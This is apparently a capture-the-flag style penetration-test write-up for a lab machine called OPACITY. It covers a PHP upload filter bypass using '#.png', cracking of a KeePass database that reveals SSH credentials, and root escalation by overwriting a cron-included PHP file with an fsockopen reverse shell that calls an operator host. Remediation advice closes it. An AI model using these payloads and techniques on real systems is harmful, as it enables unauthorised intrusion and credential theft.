Case file

Cloud upload RCE, KeePass crack, and cron include overwrite

Intermediate Linux engagement: extension-bypass PHP upload via a cloud UI yielded www-data; KeePass cracking recovered sysadmin SSH; a root cron include of backup.inc.php completed privilege escalation.

Intermediate28 minLinux · Web · KeePass · Privilege Escalation
  • An upload feature that fetched remote URLs accepted a PHP shell behind a #.png bypass. KeePass under /opt unlocked SSH as sysadmin. Root cron included a writable PHP library we replaced with a reverse shell.

  • dirsearch found /cloud/. Hosting a PHP reverse shell and uploading via http://attacker/shell.php#.png executed as www-data.

  • Exfiltrated dataset.kdbx, cracked the master password, and authenticated as sysadmin with the stored SSH secret.

  • Replaced ~/scripts/lib/backup.inc.php with a reverse shell; root cron inclusion completed the engagement.

01

Engagement summary

An upload feature that fetched remote URLs accepted a PHP shell behind a #.png bypass. KeePass under /opt unlocked SSH as sysadmin. Root cron included a writable PHP library we replaced with a reverse shell.

Against OPACITY (10.49.167.120), Apache hosted /cloud/ — a personal-cloud upload that retrieved attacker-supplied URLs. Appending #.png bypassed the image filter while the server still executed the PHP body, giving a www-data reverse shell. LinPEAS highlighted /opt/dataset.kdbx; keepass2john and John recovered master password 741852963, which held sysadmin / Cl0udP4ss40p4city#8700 for SSH. Under sysadmin, ~/scripts/script.php included lib/backup.inc.php on a root schedule. Overwriting that include with a PHP reverse shell returned root when cron fired.

Business impact

URL-fetch uploads with weak extension checks are RCE. Password databases left on disk with weak masters expose SSH. Root cron that includes user-writable PHP is intentional privilege escalation. Validate content-type and extension server-side, encrypt KeePass with strong masters off the host, and never include writable libraries from privileged jobs.

02

Cloud upload filter bypass

dirsearch found /cloud/. Hosting a PHP reverse shell and uploading via http://attacker/shell.php#.png executed as www-data.

OPERATOR · RECON

savvy@lab:~$ nmap -sV 10.49.167.120

22/tcp open ssh OpenSSH 8.2p1

80/tcp open http Apache httpd 2.4.41

savvy@lab:~$ dirsearch -u http://10.49.167.120

/cloud/ /login.php

OPERATOR · UPLOAD RCE

savvy@lab:~$ python3 -m http.server 8000

# /cloud UI URL field: http://OPERATOR:8000/shell.php#.png

savvy@lab:~$ nc -lnvp 4444

savvy@lab:~$ curl 'http://10.49.167.120/cloud/images/shell.php'

savvy@lab:/var/www/html$

03

KeePass to sysadmin SSH

Exfiltrated dataset.kdbx, cracked the master password, and authenticated as sysadmin with the stored SSH secret.

OPERATOR · KEEPASS

savvy@lab:~$ keepass2john dataset.kdbx > hash.txt

savvy@lab:~$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

741852963 (dataset)

# KeePass entry → sysadmin / Cl0udP4ss40p4city#8700

savvy@lab:~$ ssh sysadmin@10.49.167.120

savvy@lab:~$

04

Cron PHP include to root

Replaced ~/scripts/lib/backup.inc.php with a reverse shell; root cron inclusion completed the engagement.

PAYLOAD

backup.inc.php

<?php
$sock = fsockopen("OPERATOR_IP", 5555);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

OPERATOR · ROOT

savvy@lab:~$ cp backup.inc.php ~/scripts/lib/backup.inc.php

savvy@lab:~$ nc -lnvp 5555

savvy@lab:~#

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Serve uploads from a non-executable store; reject double extensions and fragment tricks. Keep secrets vaults off web hosts. Make cron includes root-owned immutable files only.